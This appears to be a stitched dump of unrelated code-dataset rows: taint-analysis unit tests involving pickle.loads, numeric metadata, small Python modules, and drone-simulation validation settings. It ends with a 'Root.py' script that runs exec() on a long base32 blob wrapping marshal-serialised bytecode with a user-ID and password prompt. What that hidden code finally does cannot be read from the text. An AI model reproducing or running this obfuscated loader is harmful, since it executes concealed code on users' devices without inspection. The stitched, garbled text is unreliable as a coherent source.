'id': 72}], 'id': 70}, {'name': 'NoneType', 'id': 73}, {'name': 'list[]', 'id': 74}, {'name': 'list[]', 'id': 75}, {'name': 'NoneType', 'id': 76}, {'name': 'list[]', 'id': 77}], 'id': 69}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=pickle)', 'id': 82}, {'name': 'Load', 'id': 83}], 'id': 81}, {'name': 'str(str=loads)', 'id': 84}, {'name': 'Load', 'id': 85}], 'id': 80}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 88}, {'name': 'Load', 'id': 89}], 'id': 87}, {'name': 'str(str=name)', 'id': 90}, {'name': 'Load', 'id': 91}], 'id': 86}, {'name': 'list[]', 'id': 92}], 'id': 79}], 'id': 78}, {'name': 'Return', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 96}, {'name': 'Load', 'id': 97}], 'id': 95}, {'name': 'str(str=name)', 'id': 98}, {'name': 'Load', 'id': 99}], 'id': 94}], 'id': 93}, {'name': 'list[]', 'id': 100}, {'name': 'NoneType', 'id': 101}], 'id': 67}, {'name': 'list[]', 'id': 102}], 'id': 37}], 'id': 1}
assert get_all_functiondef(node_dict)=='begin:5,end:36$$$$$$begin:41,end:66$$$$$$begin:67,end:101'
def test_get_all_classdef():
#demo code in test/get_all_classdef
node_dict={'name': 'Module', 'children': [{'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str', 'id': 4}], 'id': 3}], 'id': 2}, {'name': 'ClassDef', 'children': [{'name': 'str(str=A)', 'id': 6}, {'name': 'list[]', 'id': 7}, {'name': 'list[]', 'id': 8}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=__init__)', 'id': 10}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)', 'id': 13}, {'name': 'NoneType', 'id': 14}], 'id': 12}, {'name': 'arg', 'children': [{'name': 'str(str=name)', 'id': 16}, {'name': 'NoneType', 'id': 17}], 'id': 15}, {'name': 'NoneType', 'id': 18}, {'name': 'list[]', 'id': 19}, {'name': 'list[]', 'id': 20}, {'name': 'NoneType', 'id': 21}, {'name': 'list[]', 'id': 22}], 'id': 11}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 26}, {'name': 'Load', 'id': 27}], 'id': 25}, {'name': 'str(str=name)', 'id': 28}, {'name': 'Store', 'id': 29}], 'id': 24}, {'name': 'Name', 'children': [{'name': 'str(str=name)', 'id': 31}, {'name': 'Load', 'id': 32}], 'id': 30}], 'id': 23}, {'name': 'list[]', 'id': 33}, {'name': 'NoneType', 'id': 34}], 'id': 9}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=func1)', 'id': 36}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)', 'id': 39}, {'name': 'NoneType', 'id': 40}], 'id': 38}, {'name': 'NoneType', 'id': 41}, {'name': 'list[]', 'id': 42}, {'name': 'list[]', 'id': 43}, {'name': 'NoneType', 'id': 44}, {'name': 'list[]', 'id': 45}], 'id': 37}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=pickle)', 'id': 50}, {'name': 'Load', 'id': 51}], 'id': 49}, {'name': 'str(str=loads)', 'id': 52}, {'name': 'Load', 'id': 53}], 'id': 48}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 56}, {'name': 'Load', 'id': 57}], 'id': 55}, {'name': 'str(str=name)', 'id': 58}, {'name': 'Load', 'id': 59}], 'id': 54}, {'name': 'list[]', 'id': 60}], 'id': 47}], 'id': 46}, {'name': 'Return', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 64}, {'name': 'Load', 'id': 65}], 'id': 63}, {'name': 'str(str=name)', 'id': 66}, {'name': 'Load', 'id': 67}], 'id': 62}], 'id': 61}, {'name': 'list[]', 'id': 68}, {'name': 'NoneType', 'id': 69}], 'id': 35}, {'name': 'list[]', 'id': 70}], 'id': 5}], 'id': 1}
assert get_all_classdef(node_dict)=='begin:5,end:70'
def test_get_end_id():
# demo code in test/get_end_id
root={'name': 'FunctionDef', 'children': [{'name': 'str(str=func1)', 'id': 6}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)', 'id': 9}, {'name': 'NoneType', 'id': 10}], 'id': 8}, {'name': 'NoneType', 'id': 11}, {'name': 'list[]', 'id': 12}, {'name': 'list[]', 'id': 13}, {'name': 'NoneType', 'id': 14}, {'name': 'list[]', 'id': 15}], 'id': 7}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=pickle)', 'id': 20}, {'name': 'Load', 'id': 21}], 'id': 19}, {'name': 'str(str=loads)', 'id': 22}, {'name': 'Load', 'id': 23}], 'id': 18}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 26}, {'name': 'Load', 'id': 27}], 'id': 25}, {'name': 'str(str=name)', 'id': 28}, {'name': 'Load', 'id': 29}], 'id': 24}, {'name': 'list[]', 'id': 30}], 'id': 17}], 'id': 16}, {'name': 'Return', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 34}, {'name': 'Load', 'id': 35}], 'id': 33}, {'name': 'str(str=name)', 'id': 36}, {'name': 'Load', 'id': 37}], 'id': 32}], 'id': 31}, {'name': 'list[]', 'id': 38}, {'name': 'NoneType', 'id': 39}], 'id': 5}
assert get_end_id(root)==35
def test_get_call_details():
#demo code in test/get_call_details
call_node={'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=pickle)', 'id': 24}, {'name': 'Load', 'id': 25}], 'id': 23}, {'name': 'str(str=loads)', 'id': 26}, {'name': 'Load', 'id': 27}], 'id': 22}, {'name': 'Name', 'children': [{'name': 'str(str=name)', 'id': 29}, {'name': 'Load', 'id': 30}], 'id': 28}, {'name': 'list[]', 'id': 31}], 'id': 21}
assert get_call_details(call_node)=='pickle.loads$$$$$$pickle$$$$$$str(str=name)'
def test_is_tracked():
#demo code in test/is_tracked/demo.py
# case1
assign_list=[('name', ['fp'])]
# case2
assign_list2=[('name', ['fp']), ('a', ['aaa']), ('b', ['bbb']), ('c', ['a', 'b'])]
# case3
assign_list3=[('name', ['fp']), ('a', ['aaa']), ('b', ['bbb']), ('c', ['a', 'b', 'name'])]
assert is_tracked(assign_list,'name')==True
assert is_tracked(assign_list2, 'c')!=True
assert is_tracked(assign_list3,'c')==True
def test_is_controllable():
# demo code in test/is_controllable
# case1
assign_list=[('name', ['fp']), ('a', ['aaa']), ('b', ['bbb', 'sys.argv']), ('c', ['a', 'b', 'name'])]
assert is_controllable(assign_list,'c')==[(['bbb', 'sys.argv'], 'sys.argv')]
def test_ins_is_class():
# demo code in test/ins_is_class
ins='ins'
all_assigns=[('self', ['fp']), ('a', ['fp']), ('b', ['a']), ('ins', ['A', 'b'])]
assert ins_is_class(ins,'A',all_assigns)==True
def test_get_class_name():
assert get_class_name('ClassCall:A.func1')=='A'
if __name__=='__main__':
pytest.main(['unit_test.py'])
| 382.854545
| 28,218
| 0.513986
| 4,926
| 42,114
| 4.340235
| 0.057856
| 0.290178
| 0.130496
| 0.18522
| 0.861787
| 0.82507
| 0.797381
| 0.768007
| 0.71899
| 0.686062
| 0
| 0.016237
| 0.10208
| 42,114
| 110
| 28,219
| 382.854545
| 0.549147
| 0.011825
| 0
| 0
| 0
| 0.029851
| 0.498485
| 0.030981
| 0
| 0
| 0
| 0
| 0.298507
| 1
| 0.208955
| false
| 0
| 0.089552
| 0
| 0.298507
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
8773a3a97f1dd31235c04540710a7c61b8cf0441
| 49
|
py
|
Python
|
project_alphavantage/modules/__init__.py
|
leonardomarcao/projecto-alphavantage
|
ce46065c7bcb01298867c5ed8562d5a73e0b69fe
|
[
"MIT"
] | null | null | null |
project_alphavantage/modules/__init__.py
|
leonardomarcao/projecto-alphavantage
|
ce46065c7bcb01298867c5ed8562d5a73e0b69fe
|
[
"MIT"
] | 6
|
2020-02-16T21:05:51.000Z
|
2020-02-17T03:23:56.000Z
|
project_alphavantage/modules/__init__.py
|
leonardomarcao/projecto-alphavantage
|
ce46065c7bcb01298867c5ed8562d5a73e0b69fe
|
[
"MIT"
] | 1
|
2020-02-17T16:03:47.000Z
|
2020-02-17T16:03:47.000Z
|
from . import db
from . import alpha_vantage_api
| 16.333333
| 31
| 0.795918
| 8
| 49
| 4.625
| 0.75
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163265
| 49
| 2
| 32
| 24.5
| 0.902439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5e5a37af62a89d6750c12567ab471b3edeca070c
| 83
|
py
|
Python
|
staging/contexts.py
|
Pyromanser/django-staging
|
1273ba880f48705f968e85631f55af036b1dceb2
|
[
"BSD-3-Clause"
] | null | null | null |
staging/contexts.py
|
Pyromanser/django-staging
|
1273ba880f48705f968e85631f55af036b1dceb2
|
[
"BSD-3-Clause"
] | null | null | null |
staging/contexts.py
|
Pyromanser/django-staging
|
1273ba880f48705f968e85631f55af036b1dceb2
|
[
"BSD-3-Clause"
] | 2
|
2021-06-07T23:09:19.000Z
|
2021-06-09T21:27:55.000Z
|
def data_generator_enabled(request):
return {'DATA_GENERATOR_ENABLED': True}
| 16.6
| 43
| 0.771084
| 10
| 83
| 6
| 0.7
| 0.433333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13253
| 83
| 4
| 44
| 20.75
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.271605
| 0.271605
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
5e74954984ceb331e27a922b03178c98130a3b35
| 5,225
|
py
|
Python
|
build/lib/drone_awe/validationsettings.py
|
rymanderson/Drone-Models
|
396ed030f277a96365c7cbfaffb3d2006e5b12a8
|
[
"MIT"
] | 2
|
2019-12-01T10:27:54.000Z
|
2019-12-01T10:28:07.000Z
|
build/lib/drone_awe/validationsettings.py
|
rymanderson/drone_awe
|
396ed030f277a96365c7cbfaffb3d2006e5b12a8
|
[
"MIT"
] | null | null | null |
build/lib/drone_awe/validationsettings.py
|
rymanderson/drone_awe
|
396ed030f277a96365c7cbfaffb3d2006e5b12a8
|
[
"MIT"
] | null | null | null |
params = [
{
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 85.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'missionspeed',
'ylabel': 'alpha',
'title': 'Stolaroff',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.0,
'xend': 15.0,
'xnumber': 10,
'validation': False,
'validationcase': 'Stolaroff2018',
'batterytechnology': 'current'
},
{
'validation': False,
'validationcase': 'Ostler2009',
'drone': True,
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 89.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'missionspeed',
'ylabel': 'power',
'title': 'Ostler2009',
'simulationtype': 'simple',
'xbegin': 0.0,
'xend': 30.0,
'xnumber': 20,
'batterytechnology': 'current'
},
{
'drone': True,
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 89.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'payload',
'ylabel': 'endurance',
'title': 'FreeFLY_Alta8',
'simulationtype': 'simple',
'xbegin': 0.0,
'xend': 10.0,
'xnumber': 100,
'validation': False,
'validationcase': 'FreeFLYAlta8',
'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'payload',
'ylabel': 'endurance',
'title': 'FreeFLY_Alta8',
'simulationtype': 'simple',
'xbegin': 0.0,
'xend': 1.0,
'xnumber': 20,
'validation': False,
'validationcase': 'FireFLY6Pro',
'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 90.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'payload',
'ylabel': 'power',
'title': 'First_test',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.5,
'xend': 1.5,
'xnumber': 10,
'validation': False,
'validationcase': 'Dorling2017_3S',
'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 90.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'payload',
'ylabel': 'power',
'title': 'First_test',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.5,
'xend': 1.5,
'xnumber': 10,
'validation': False,
'validationcase': 'Dorling2017_4S',
'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'missionspeed',
'ylabel': 'power',
'title': 'DiFranco',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.0,
'xend': 16.0,
'xnumber': 20,
'validation': False,
'validationcase': 'DiFranco2016',
'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'missionspeed',
'ylabel': 'power',
'title': 'Stolaroff',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.0,
'xend': 16.0,
'xnumber': 20,
'validation': False,
'validationcase': 'Chang2016',
'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 90.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'payload',
'ylabel': 'endurance',
'title': 'Abdilla 2015 Endurance vs Payload Validation Test',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.4,
'xend': 0.55,
'xnumber': 20,
'validation': False,
'validationcase': 'Abdilla2015endurance',
'batterytechnology': 'current'
}
]
| 19.942748
| 61
| 0.666029
| 605
| 5,225
| 5.742149
| 0.117355
| 0.022453
| 0.069948
| 0.059585
| 0.905584
| 0.883708
| 0.86327
| 0.850892
| 0.850892
| 0.850892
| 0
| 0.077217
| 0.097799
| 5,225
| 262
| 62
| 19.942748
| 0.659737
| 0
| 0
| 0.843511
| 0
| 0
| 0.561424
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d5afb200498f723318d3f7b95850079386a9963
| 16,702
|
py
|
Python
|
Root.py
|
SidraELEzz/Basic
|
022bbcc3c418f694a9c3e86ae73ed8d220393936
|
[
"MIT"
] | 13
|
2021-01-30T14:56:24.000Z
|
2022-03-05T16:59:47.000Z
|
Root.py
|
SidraELEzz/Basic
|
022bbcc3c418f694a9c3e86ae73ed8d220393936
|
[
"MIT"
] | null | null | null |
Root.py
|
SidraELEzz/Basic
|
022bbcc3c418f694a9c3e86ae73ed8d220393936
|
[
"MIT"
] | 1
|
2021-02-22T09:01:10.000Z
|
2021-02-22T09:01:10.000Z
|
#Coded By Sidra ELEzz 2021
#YouTube :Termux Tools
#Telegram:@SS_SS_1
import base64
exec(base64.b32decode('ENBW6ZDFMQQEE6JAKRSWOYLSEBEUICTJNVYG64TUEBWWC4TTNBQWYCTFPBSWGKDNMFZHG2DBNQXGY33BMRZSQJ3DLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGNOHQMBQLR4DAMC4PAYDAQC4PAYDAXDYGAYFY6BQGBZSCXDYGAYFY6BQGBOHQMBQMROHQMBQLR4DAMDELR4DAMK4PAYDA3C4PAYDAXDYGAYFUXDYGAYFY6BQGBSVY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMS4PAYDAXDYHAZVY6BQGFOHQMBQMROHQMBRLR4DAMC4PAYDIVLELR4DAMK4PAYDAUZILR4DAM24PAYDAXDYGAYFY6BQGBUVY6DGMZOHQZTGLR4GMZS4PBTGMTTTLR4GCYS4PAYGMXDYGAYFY6BQGBRVY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDGXDYGAYFY6BQGBOHQMBQIBOHQMBQLR4DAMC4PAYDA4ZBLR4DAMC4PAYDAXDYGAYGIXDYGAYFY6BQGBSFY6BQGFOHQMBQNROHQMBQLR4DAMC2LR4DAMC4PAYDAZK4PAYDAXDYGAYGUXDYGAYVY6BQGBSFY6BQGJOHQMBQLR4DQM24PAYDCXDYGAYGIXDYGAYVY6BQGBOHQMBUKVSFY6BQGFOHQMBQKMUFY6BQGNOHQMBQLR4DAMC4PAYDA2K4PBTGMXDYMZTFY6DGMZOHQZTGJZZVY6BRGROHQMDGLR4DAMC4PAYDAY24PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBTLR4DAMC4PAYDAXDYGAYEAXDYGAYFY6BQGBOHQMBQOMQVY6BQGBOHQMBQLR4DAMDELR4DAMC4PAYDAZC4PAYDCXDYGAYGYXDYGAYFY6BQGBNFY6BQGBOHQMBQMVOHQMBQLR4DAMDKLR4DAMK4PAYDAZC4PAYDEXDYGAYFY6BYGNOHQMBRLR4DAMDELR4DAMK4PAYDAXDYGA2FKZC4PAYDCXDYGAYFGKC4PAYDGXDYGAYFY6BQGBOHQMBQNFOHQZTGLR4GMZS4PBTGMXDYMZTE4435LR4DAZK4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHGXDYMU3FY4S4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHGT24OJOHQMBQLR4DAMDDLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGNOHQMBQLR4DAMC4PAYDAQC4PAYDAXDYGAYFY6BQGBZSCXDYGAYFY6BQGBOHQMBQMROHQMBQLR4DAMDELR4DAMK4PAYDA3C4PAYDAXDYGAYFUXDYGAYFY6BQGBSVY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMS4PAYDAXDYHAZVY6BQGFOHQMBQMROHQMBRLR4DAMC4PAYDIVLELR4DAMK4PAYDAUZILR4DAM24PAYDAXDYGAYFY6BQGBUVY6DGMZOHQZTGLR4GMZS4PBTGMTTTLR4GEOC4PAYGGXDYGAYFY6BQGBRVY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDGXDYGAYFY6BQGBOHQMBQIBOHQMBQLR4DAMC4PAYDA4ZBLR4DAMC4PAYDAXDYGAYGIXDYGAYFY6BQGBSFY6BQGFOHQMBQNROHQMBQLR4DAMC2LR4DAMC4PAYDAZK4PAYDAXDYGAYGUXDYGAYVY6BQGBSFY6BQGJOHQMBQLR4DQM24PAYDCXDYGAYGIXDYGAYVY6BQGBOHQMBUKVSFY6BQGFOHQMBQKMUFY6BQGNOHQMBQLR4DAMC4PAYDA2K4PBTGMXDYMZTFY6DGMZOHQZTGJZZSCXDYGBRVY6BQGBOHQMBQMNOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAZVY6BQGBOHQMBQLR4DAMCALR4DAMC4PAYDAXDYGAYHGIK4PAYDAXDYGAYFY6BQGBSFY6BQGBOHQMBQMROHQMBRLR4DAMDMLR4DAMC4PAYDAWS4PAYDAXDYGAYGKXDYGAYFY6BQGBVFY6BQGFOHQMBQMROHQMBSLR4DAMC4PA4DGXDYGAYVY6BQGBSFY6BQGFOHQMBQLR4DANCVMROHQMBRLR4DAMCTFBOHQMBTLR4DAMC4PAYDAXDYGAYGSXDYMZTFY6DGMZOHQZTGLR4GMZSOONOHQODBLR4DAYS4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHGXDYMYZVY3S4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHGXC4LRXFY6BQGBOHQMBQMNOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAZVY6BQGBOHQMBQLR4DAMCALR4DAMC4PAYDAXDYGAYHGIK4PAYDAXDYGAYFY6BQGBSFY6BQGBOHQMBQMROHQMBRLR4DAMDMLR4DAMC4PAYDAWS4PAYDAXDYGAYGKXDYGAYFY6BQGBVFY6BQGFOHQMBQMROHQMBSLR4DAMC4PA4DGXDYGAYVY6BQGBSFY6BQGFOHQMBQLR4DANCVMROHQMBRLR4DAMCTFBOHQMBTLR4DAMC4PAYDAXDYGAYGSXDYMZTFY6DGMZOHQZTGLR4GMZSOONOHQYZVLR2FY6BQGBOHQMBQMNOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAZFY6BQGBOHQMBQLR4DAMCALR4DAMC4PAYDAXDYGAYHGXDYMM3FY6BQGBOHQMBQLR4DAMDELR4DAMC4PAYDAWS4PAYDAXDYGAYGIXDYGAYFY6BQGBNFY6BQGFOHQMBQMROHQMBRLR4DAMC2LR4DAMS4PAYDA6DZLR4DAMDFLR4DAMS4PAYDAZC4PAYDCXDYGAYGWXDYGAZFY6BQGBZFY6BYMROHQMBQMVOHQMBTLR4DAMDELR4DAMS4PAYDAXDYHAZVY6BQGFOHQMBQLJOHQMBULR4DAMDFLR4DANC4PAYDAZK4PAYDAXDYGAYGWXDYGAZFY6BQGBZHQXDYGAYGKXDYGAZVY6BQGBSFY6BQGNOHQMBQLR4DQM24PAYDCXDYGAYFUXDYGA2VY6BQGBSVY6BQGVOHQMBQMVOHQMBRLR4DAMDLLR4DAMS4PAYDA4TDLR4DAMDELR4DANC4PAYDAZK4PAYDIXDYGAYFY6BRG5DUQZC4PAYDKXDYGAYFUXDYGAZFY6BQGBYVY6BYMFOHQMBQMROHQMBWLR4DAMCHJBSVY6BQGZOHQMBQNJOHQMBXLR4DAMDELR4DAN24PAYDAXDYHAZVY6BQGFOHQMBQLR4DAMLRLR4DCNK4PAYDAZC4PAYDQXDYGAYEOSDFLR4DANS4PAYDA2S4PAYDOXDYGAYGIXDULR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBROFOHQMJVLR4DAMCXMROG4XDYGAYGIXDYGBRFY6BQGBWFY6BQGZOHQMBQLJOHQMBWLR4DAMDELRXFY6BQGBSFY6BQMJOHQMBQNROHQMBYLR4DAMC2LR4DAOC4PAYDAZC4NZOHQMBQMROHQMDCLR4DAMDMLR2FY6BQGBNFY5C4PAYDAZC4PAYGGXDYGAYFY6BYGROHQMBQLR4DAMC2LRXFY6BQGBSVY3S4PAYDAXDYHAZVY6BQGBOHQMBQLR4DAMLELR4DAYS4PAYDAUZILRZFY6BQGBOHQMBQLR4DAMDULRXFY6BQGBOHQMBQLR4DAMCTNFSHEYLFNRSXU6TULR4DANC4PAYDAXDYGAYFY6BQGB2HE5LFOMTFY6BQGBOHQMBQLR4DAMC4PAYWEWZRHM4TM3K3LR4DCYK5EBOHQMLCLMYTWOJXNVKVGRKSEBEUIIC4PAYWEWZRHM4TM3J6HY7D4IDTLQTVY6BQGBOHQMBQLR4DAMC4PAYWEWZRHM4TM3K3LR4DCYK5EBOHQMLCLMYTWOJXNVIECU2TK5HVERBALR4DCYS3GE5TSNTNHY7D4PRAONOHQMLBLR4DAMC4PAYDAXDYGAYEY33HM5SWII